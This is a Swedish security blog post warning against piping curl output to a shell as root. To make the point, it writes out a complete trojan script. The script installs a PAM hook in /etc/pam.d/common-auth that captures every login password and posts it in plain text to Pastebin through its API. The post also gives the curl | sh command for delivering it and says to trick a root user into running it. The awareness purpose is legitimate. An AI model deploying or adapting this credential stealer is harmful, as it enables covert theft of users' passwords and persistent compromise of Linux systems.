Var försiktig med att curl:a skript som root
Att installera program i Linux genom att omdirigera utdata från Curl till skalet är snabbt och smidigt. Men det är ack så farligt om du inte känner till programmet eller dess ursprung.
För att demonstrera hur någon kan plantera skadlig kod på en
Linuxdator ska vi här skriva en enkel trojan. Vi placerar den därefter på en
webbserver. När någon – som användaren root – exekverar det genom curl
kommer
ett skript att placeras i /usr/local/bin/hack
. En rad kommer också att läggas
till i /etc/pam.d/common-auth
.
När någon sedan loggar in på datorn kommer den användarens lösenord att laddas
upp till ett Pastebin-konto. Filnamnet på Pastbin-kontot blir
användarnamn_password
. Innehållet i filen är användarens lösenord i klartext.
Trojanen använder PAM för att snappa upp lösenordet vid inloggning. Här
används alternativet expose_authtok
(expose authentication token) med
skriptet /usr/local/bin/hack
. PAM-alternativet expose_authtok
gör att det
går att utläsa användarens lösenord via standard input. Detta använder
skriptet /usr/local/bin/hack
. Lösenordet fångas upp till en variabel och
skickas till Pastebin via deras API.
Skapa och testa trojanen
Observera att koden för trojanen bara är testad på Debian och Ubuntu.
Vi börjar med att skapa en fil med namnet run-me.sh
och placerar det på en
webbserver. I mitt fall placerar jag det endast på en intern webbserver.
Innehållet i run-me.sh
ska vara följande:
#!/bin/bash
PATH="/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
if grep -q "/usr/local/bin/hack" /etc/pam.d/common-auth; then
exit 0
else
cat <<- "EOF" > /usr/local/bin/hack
#!/bin/bash
PATH="/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
PAM_PASSWORD=`cat -`
curl -X POST -d "api_dev_key=xxxyyyzzz" \
-d "api_paste_code=${PAM_PASSWORD}" -d "api_option=paste" \
-d "api_paste_private=2" -d "api_paste_name=${PAM_USER}_password" \
-d "api_user_key=aaabbbccc" \
"https://pastebin.com/api/api_post.php"
exit 0
EOF
chmod +x /usr/local/bin/hack
echo "auth optional pam_exec.so expose_authtok /usr/local/bin/hack" >> \
/etc/pam.d/common-auth
fi
I mitt fall går filen nu att nå på den interna adressen
http://kate.nixnet.jke/run-me.sh.
Nästa steg blir att lura en root-användare att köra skriptet. Skriptet ska då exekveras med kommandot:
curl http://kate.nixnet.jke/run-me.sh | sh -s -
När root-användaren väl har kört skriptet är det bara att vänta på att någon loggar in på datorn. Lösenordet kommer då att skickas i klartext till Pastbin-kontot. Det kommer att se ut som i bilden nedan.
Användaren jakes lösenord i klartext, som här är Kalle123
Avslutning
Så enkelt är det således att hacka ett system om man inte är försiktig med vad man exekverar som root. Det krävdes färre än 20 rader kod för att få användarnas lösenord skickade via Pastebin, allteftersom de loggar in på datorn. Då kan man bara fantisera om vad som skulle vara möjligt att åstadkomma med mer tid och resurser.
Kommentarer
Kommentarsfältet är modererat. Det innebär att alla kommentarer granskas av ansvarig utgivare före publicering.
Du väljer själv om du vill ange ditt riktiga namn, en pseudonym eller vara helt anonym. Ingen registrering behövs.
Relaterade artiklar
-
PGP-krypterat formulär
Jag blev inspirerad av Tutanotas Secure Connect – ett säkert webbformulär som skickar uppgifterna krypterat direkt till inkorgen. Skulle det inte gå att bygga något liknande med PGP? Det gick, och det var dessutom förvånansvärt enkelt då det redan finns ett GnuPG-bibliotek för PHP.
-
GDPR som ett stöd, inte ett hinder
Företag, föreningar och kommuner borde se GDPR som ett stöd och en vägledning, inte ett hinder. Trots det är det många som väntar ut Schrems II-domens efterspel för att inte behöva göra något. Andra försöker komma runt GDPR på olika sätt. Men man får glömma inte bort vem GDPR ska skydda – organisationens viktigaste tillgångar; kunderna, medlemmarna och invånarna.
-
Vidarebefordran av SSH-agenten
SSH agent forwarding, eller vidarebefordran av SSH-agenten, innebär att man kan vidarebefordra SSH-agenten till ett fjärrsystem. På så sätt behöver man inte kopiera sin privata SSH-nyckel till fjärrsystemet, eller skapa flera nycklar för olika system. Men det finns risker med det.
-
Tvåfaktorsautentisering vid SSH-inloggning
Med hjälp av en PAM-modul går det att aktivera tvåfaktorsautentisering i Linux med exempelvis Google Authenticator-appen. Linuxsystemet kräver då både användarens lösenord samt ett engångslösenord. Det går även att kombinera en SSH-nyckel med ett engångslösenord.
Senaste nyheterna och inläggen
-
Demonerna på internet
Efter många månaders arbete är boken Demonerna på internet klar. Planerad utgivning är i mitten av juni.
-
Ny utgåva av Docker från grunden
Docker från grunden utkommit i en ny utgåva. Den största skillnaden är uppdateringen till Docker Compose version 2. Även andra mindre uppdateringar har gjorts för att hålla boken aktuell.
-
PGP-krypterat formulär
Jag blev inspirerad av Tutanotas Secure Connect – ett säkert webbformulär som skickar uppgifterna krypterat direkt till inkorgen. Skulle det inte gå att bygga något liknande med PGP? Det gick, och det var dessutom förvånansvärt enkelt då det redan finns ett GnuPG-bibliotek för PHP.
-
DOSBox för att programmera gamla personsökare
DOSBox kan användas till betydligt mer än bara gamla spel. Ett intressant användningsområde är att kunna använda gamla DOS-program för att programmera diverse enheter över serieporten. Oftast behövs inte ens en serieport, istället går det att använda en USB-serieportsadapter.
Utvalda artiklar
-
Poliser satte dit oskyldig
Två poliser dömdes i juni till vardera ett års fängelse av Lunds tingsrätt för att ha misshandlat och gripit en oskyldig man i hans bostad i Landskrona. Händelsen ägde rum en natt i mars förra året och spelades in av en övervakningskamera i mannens bostad.
-
Retroloppis i Påarp
Idag var det retroloppis hos Andreas Nilsson i Påarp. På baksidan av huset fanns hundratals spel uppradade på långa bord. Trots friska vindar och sval temperatur var loppisen välbesökt.
-
Stort deltagande på årets Gubbdata
I helgen var det Gubbdata i Lund – ett av Sveriges största demoparty. På plats fanns cirka ett hundra deltagare, alla med en passion för retrodatorer.
-
Kapad identitet
I mitten av september förra året blev Kristina utsatt för ett id-kapningsförsök. Någon hade ansökt om ett lån på 250 000 kr i hennes namn. Låneansökan gick ut till ett 20-tal banker.
-
Amiga-scenen lever än
I en villa mellan Ljungskile och Stenungsund den 27 november träffades de igen, ett gäng glada Amiga-entusiaster. Man träffas för att prata, titta på demos, spela och ha allmänt trevligt.
CyberInfo Sverige är ett IT- och medieföretag i nordvästra Skåne som tillhandahåller böcker, utbildningar, nyheter och konsulttjänster inom Linux, säkerhet och programmering.
CyberInfo Sverige är godkänd för F-skatt, är momsregistrerat och innehar
utgivningsbevis för webbplatsen www.cyberinfo.se.